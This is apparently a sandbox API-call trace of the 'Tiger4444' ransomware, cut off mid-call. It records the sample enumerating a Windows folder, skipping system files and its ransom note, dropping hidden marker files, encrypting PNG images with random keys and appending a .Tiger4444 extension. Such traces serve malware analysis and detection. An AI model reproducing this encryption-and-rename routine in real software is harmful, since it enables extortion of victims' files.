CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\i386\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.445] WriteFile (in: hFile=0x260, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0041.447] FlushFileBuffers (hFile=0x260) returned 1 [0041.449] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\i386\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0041.449] CloseHandle (hObject=0x260) returned 1 [0041.450] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666c0 [0041.450] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x46) returned 0xc7b1e8 [0041.450] RtlInterlockedPushEntrySList (in: ListHead=0xc66808, ListEntry=0xc666c8 | out: ListHead=0xc66808, ListEntry=0xc666c8) returned 0x0 [0041.450] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3b3c1b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63c947, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea63c947, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ux", cAlternateFileName="")) returned 1 [0041.450] lstrcmpiW (lpString1="ux", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.450] lstrcmpiW (lpString1="ux", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.450] lstrcmpiW (lpString1="ux", lpString2="Tiger4444.exe") returned 1 [0041.450] lstrcmpiW (lpString1="ux", lpString2=".") returned 1 [0041.450] lstrcmpiW (lpString1="ux", lpString2="..") returned 1 [0041.450] lstrcmpiW (lpString1="ux", lpString2="windows") returned -1 [0041.450] lstrcmpiW (lpString1="ux", lpString2="bootmgr") returned 1 [0041.450] lstrcmpiW (lpString1="ux", lpString2="pagefile.sys") returned 1 [0041.450] lstrcmpiW (lpString1="ux", lpString2="boot") returned 1 [0041.450] lstrcmpiW (lpString1="ux", lpString2="ids.txt") returned 1 [0041.450] lstrcmpiW (lpString1="ux", lpString2="NTUSER.DAT") returned 1 [0041.450] lstrcpyW (in: lpString1=0x30aeae4, lpString2="ux" | out: lpString1="ux") returned="ux" [0041.450] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666e0 [0041.450] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x42) returned 0xc7b238 [0041.450] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666e8 | out: ListHead=0xc66828, ListEntry=0xc666e8) returned 0xc66548 [0041.450] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3b3c1b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63c947, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea63c947, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ux", cAlternateFileName="")) returned 0 [0041.450] FindClose (in: hFindFile=0xc72e88 | out: hFindFile=0xc72e88) returned 1 [0041.450] lstrcpyW (in: lpString1=0x30aeae4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0041.450] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0041.451] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0041.451] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0041.452] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.452] CloseHandle (hObject=0x260) returned 1 [0041.452] CloseHandle (hObject=0x2ac) returned 1 [0041.453] GetCurrentThreadId () returned 0xfa8 [0041.453] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666e8 [0041.453] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Windows10Upgrade\\resources\\ux", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\ux") returned="C:\\Windows10Upgrade\\resources\\ux" [0041.453] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7b238 | out: hHeap=0xc50000) returned 1 [0041.453] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666e0 | out: hHeap=0xc50000) returned 1 [0041.453] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\ux" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux") returned="C:\\Windows10Upgrade\\resources\\ux" [0041.453] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\") returned="C:\\Windows10Upgrade\\resources\\ux\\" [0041.453] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\ux\\.BFC0E91B00AE8A0620D3" [0041.453] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\ux\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0041.478] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0041.482] FlushFileBuffers (hFile=0x2ac) returned 1 [0041.493] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0041.493] CloseHandle (hObject=0x2ac) returned 1 [0041.494] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\ux") returned 32 [0041.494] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.494] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\ux\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3b3c1b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63c947, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7dbdc9fb, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d08 [0041.494] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.494] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0041.494] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0041.494] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.495] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3b3c1b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63c947, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7dbdc9fb, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.495] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.495] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0041.495] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0041.495] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.495] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.495] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7dbdc9fb, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7dbdc9fb, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7dbdc9fb, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0041.495] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.495] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0041.495] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3b4fa7, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b4fa7, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="block.png", cAlternateFileName="")) returned 1 [0041.495] lstrcmpiW (lpString1="block.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.495] lstrcmpiW (lpString1="block.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.495] lstrcmpiW (lpString1="block.png", lpString2="Tiger4444.exe") returned -1 [0041.495] lstrcmpiW (lpString1="block.png", lpString2=".") returned 1 [0041.495] lstrcmpiW (lpString1="block.png", lpString2="..") returned 1 [0041.495] lstrcmpiW (lpString1="block.png", lpString2="windows") returned -1 [0041.495] lstrcmpiW (lpString1="block.png", lpString2="bootmgr") returned -1 [0041.495] lstrcmpiW (lpString1="block.png", lpString2="pagefile.sys") returned -1 [0041.495] lstrcmpiW (lpString1="block.png", lpString2="boot") returned -1 [0041.495] lstrcmpiW (lpString1="block.png", lpString2="ids.txt") returned -1 [0041.495] lstrcmpiW (lpString1="block.png", lpString2="NTUSER.DAT") returned -1 [0041.495] lstrcpyW (in: lpString1=0x30aeaea, lpString2="block.png" | out: lpString1="block.png") returned="block.png" [0041.495] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\block.png", dwFileAttributes=0x0) returned 1 [0041.496] lstrlenW (lpString="block.png") returned 9 [0041.496] lstrlenW (lpString="Tiger4444") returned 9 [0041.496] lstrcmpiW (lpString1="block.png", lpString2="Tiger4444") returned -1 [0041.496] lstrlenW (lpString=".dll") returned 4 [0041.496] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0041.496] lstrlenW (lpString=".lnk") returned 4 [0041.496] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0041.496] lstrlenW (lpString=".ini") returned 4 [0041.496] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0041.496] lstrlenW (lpString=".sys") returned 4 [0041.496] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0041.496] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\block.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\block.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.496] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.496] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13294945608) returned 1 [0041.496] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=919) returned 1 [0041.496] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0041.497] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0041.497] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a0, lpName=0x0) returned 0x2c8 [0041.498] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a0) returned 0xbe0000 [0041.510] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.510] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0041.510] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.510] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0041.510] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.510] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0041.510] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.510] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0041.510] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13296345530) returned 1 [0041.510] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0041.510] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0041.510] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.511] CloseHandle (hObject=0x2c8) returned 1 [0041.511] CloseHandle (hObject=0x260) returned 1 [0041.512] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\block.png.Tiger4444") returned 52 [0041.512] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\block.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\block.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\block.png.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\block.png.tiger4444"), dwFlags=0x1) returned 1 [0041.514] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=928 | out: Addend=0xc6f980) returned 4047824 [0041.514] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=13 | out: Addend=0xc6f98c) returned 2304 [0041.514] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3b8a24, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b8a24, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x749e0600, ftLastWriteTime.dwHighDateTime=0x1d2ea8c, nFileSizeHigh=0x0, nFileSizeLow=0x1ba8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bluelogo.png", cAlternateFileName="")) returned 1 [0041.514] lstrcmpiW (lpString1="bluelogo.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.514] lstrcmpiW (lpString1="bluelogo.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.514] lstrcmpiW (lpString1="bluelogo.png", lpString2="Tiger4444.exe") returned -1 [0041.514] lstrcmpiW (lpString1="bluelogo.png", lpString2=".") returned 1 [0041.514] lstrcmpiW (lpString1="bluelogo.png", lpString2="..") returned 1 [0041.514] lstrcmpiW (lpString1="bluelogo.png", lpString2="windows") returned -1 [0041.514] lstrcmpiW (lpString1="bluelogo.png", lpString2="bootmgr") returned -1 [0041.514] lstrcmpiW (lpString1="bluelogo.png", lpString2="pagefile.sys") returned -1 [0041.514] lstrcmpiW (lpString1="bluelogo.png", lpString2="boot") returned -1 [0041.514] lstrcmpiW (lpString1="bluelogo.png", lpString2="ids.txt") returned -1 [0041.514] lstrcmpiW (lpString1="bluelogo.png", lpString2="NTUSER.DAT") returned -1 [0041.514] lstrcpyW (in: lpString1=0x30aeaea, lpString2="bluelogo.png" | out: lpString1="bluelogo.png") returned="bluelogo.png" [0041.514] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png", dwFileAttributes=0x0) returned 1 [0041.515] lstrlenW (lpString="bluelogo.png") returned 12 [0041.515] lstrlenW (lpString="Tiger4444") returned 9 [0041.515] lstrcmpiW (lpString1="elogo.png", lpString2="Tiger4444") returned -1 [0041.515] lstrlenW (lpString=".dll") returned 4 [0041.515] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0041.515] lstrlenW (lpString=".lnk") returned 4 [0041.515] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0041.515] lstrlenW (lpString=".ini") returned 4 [0041.515] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0041.515] lstrlenW (lpString=".sys") returned 4 [0041.515] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0041.515] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\bluelogo.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.515] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.515] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13296833142) returned 1 [0041.515] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=7080) returned 1 [0041.515] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0041.515] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0041.515] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1eb0, lpName=0x0) returned 0x2c8 [0041.517] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1eb0) returned 0xbe0000 [0041.525] CryptAcquireContextW (in: phProv=0x30abb40, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30abb40*=0xc71b70) returned 1 [0041.525] CryptGenRandom (in: hProv=0xc71b70, dwLen=0x80, pbBuffer=0x30abb5c | out: pbBuffer=0x30abb5c) returned 1 [0041.525] CryptReleaseContext (hProv=0xc71b70, dwFlags=0x0) returned 1 [0041.525] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.525] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0041.525] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.525] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0041.525] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.526] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0041.526] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.526] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0041.526] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13297889218) returned 1 [0041.526] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0041.526] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0041.526] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.526] CloseHandle (hObject=0x2c8) returned 1 [0041.526] CloseHandle (hObject=0x260) returned 1 [0041.527] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png.Tiger4444") returned 55 [0041.527] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\bluelogo.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\bluelogo.png.tiger4444"), dwFlags=0x1) returned 1 [0041.528] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=7088 | out: Addend=0xc6f980) returned 4048752 [0041.528] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=10 | out: Addend=0xc6f98c) returned 2317 [0041.528] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3b9dbd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3b9dbd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bullet.png", cAlternateFileName="")) returned 1 [0041.528] lstrcmpiW (lpString1="bullet.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.528] lstrcmpiW (lpString1="bullet.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.528] lstrcmpiW (lpString1="bullet.png", lpString2="Tiger4444.exe") returned -1 [0041.528] lstrcmpiW (lpString1="bullet.png", lpString2=".") returned 1 [0041.528] lstrcmpiW (lpString1="bullet.png", lpString2="..") returned 1 [0041.528] lstrcmpiW (lpString1="bullet.png", lpString2="windows") returned -1 [0041.528] lstrcmpiW (lpString1="bullet.png", lpString2="bootmgr") returned 1 [0041.528] lstrcmpiW (lpString1="bullet.png", lpString2="pagefile.sys") returned -1 [0041.528] lstrcmpiW (lpString1="bullet.png", lpString2="boot") returned 1 [0041.528] lstrcmpiW (lpString1="bullet.png", lpString2="ids.txt") returned -1 [0041.528] lstrcmpiW (lpString1="bullet.png", lpString2="NTUSER.DAT") returned -1 [0041.528] lstrcpyW (in: lpString1=0x30aeaea, lpString2="bullet.png" | out: lpString1="bullet.png") returned="bullet.png" [0041.529] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\bullet.png", dwFileAttributes=0x0) returned 1 [0041.529] lstrlenW (lpString="bullet.png") returned 10 [0041.529] lstrlenW (lpString="Tiger4444") returned 9 [0041.529] lstrcmpiW (lpString1="ullet.png", lpString2="Tiger4444") returned 1 [0041.529] lstrlenW (lpString=".dll") returned 4 [0041.529] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0041.529] lstrlenW (lpString=".lnk") returned 4 [0041.529] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0041.529] lstrlenW (lpString=".ini") returned 4 [0041.529] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0041.529] lstrlenW (lpString=".sys") returned 4 [0041.529] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0041.529] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\bullet.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\bullet.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.529] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.529] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13298256489) returned 1 [0041.530] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=221) returned 1 [0041.530] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0041.530] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0041.530] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e0, lpName=0x0) returned 0x2c8 [0041.531] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e0) returned 0xbe0000 [0041.532] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.532] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0041.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.533] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0041.533] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0041.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0041.533] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13298601659) returned 1 [0041.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0041.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0041.533] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.533] CloseHandle (hObject=0x2c8) returned 1 [0041.533] CloseHandle (hObject=0x260) returned 1 [0041.535] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\bullet.png.Tiger4444") returned 53 [0041.535] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\bullet.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\bullet.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\bullet.png.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\bullet.png.tiger4444"), dwFlags=0x1) returned 1 [0041.535] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=224 | out: Addend=0xc6f980) returned 4055840 [0041.535] InterlockedExchangeAdd 